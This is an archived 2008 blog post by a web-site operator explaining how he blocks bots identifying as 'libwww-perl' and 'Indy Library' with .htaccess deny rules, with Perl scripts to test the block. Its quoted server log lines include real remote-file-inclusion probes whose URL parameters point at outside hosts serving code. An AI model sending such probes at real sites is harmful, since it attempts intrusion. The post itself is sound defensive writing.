
libwww-perl and Indy Library in your server logs?

Archive - Originally posted on "The Horse's Mouth" - 2008-09-13 08:28:48 - Graham Ellis

Here are some sample lines from our server logs ... and I don't like the look of them!

from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24


from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17


Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also known as the "User Agent") - are very likely attempts to find a security hole in our site scripts, through which the attacking programs can copy themselves onto our server and go on to infect other systems, or use our site to advertise theirs by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually indicates the Indy ("Internet Direct") components that ship with the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww is from Perl's LWP (Library for WWW in Perl) module, so in this case it's probable that someone has written an automated program in Perl ...

Automated programs are a necessity - and indeed we welcome well-behaved crawlers, from the well-known Google and Yahoo through to more obscure ones too. But authors of crawlers who properly know what they're doing change the User Agent string rather than using the default; in my experience, we really don't want the default-named crawlers on our site - at least 90% of them are malicious, and the remaining 10% are amateur efforts. So how can we turn them off?

Standard practice is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that, so we need to enforce the rule!
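For the record, a robots.txt entry asking a particular robot to keep away looks like this (the user agent token here is just an illustration):

User-agent: libwww-perl
Disallow: /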

Here are three lines that I've added to our .htaccess file ...

# Tag any request whose User Agent contains either string (case-insensitive) ...
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
# ... and refuse to serve tagged requests
Deny from env=naughty_boys


These directives send a 403 Forbidden message out to the automata, telling them that they can't have the page they seek. Goodness knows what the receiving bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
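One way of keeping that handler light - a suggestion rather than a description of our own setup - is to have Apache send a short fixed string instead of a full error page. In Apache 2.2's syntax, a message beginning with a double quote (the quote itself is not sent) does the job:

ErrorDocument 403 "Access denied.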

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

# LWP identifies itself as "libwww-perl/<version>" unless told otherwise
my $ua = LWP::UserAgent->new;

# Request the home page; print the body on success, the status on failure
my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}


And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$
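
The same check can be made from the shell, assuming curl is installed; the -A option sets the User Agent string and -w '%{http_code}' prints just the response status, so this one-liner should report 403:

curl -s -o /dev/null -w '%{http_code}\n' -A 'libwww-perl' http://www.wellho.net/index.html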


If I add the line:

$ua->agent("Well House Consultants Bot");

into that program (before the request is made), I get a much more satisfying result back ...

-bash-3.2$ perl pg2
 
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on


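For reference, here is the second test program in full - the same script as above with the agent line added:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

# Declare our own User Agent string rather than using LWP's default
my $ua = LWP::UserAgent->new;
$ua->agent("Well House Consultants Bot");

my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}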


One of the matters that I considered very carefully indeed before blocking these user agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater, if you like. Not the case, I believe - most people with legitimate babies take good care of them and name them properly - but I will be watching my log files nonetheless to check.

As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty-programs-looking-for-security-holes-on-your-server-.html/errors.php?error=http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is trying to hack into a previous short article on security holes - and is firmly denied access.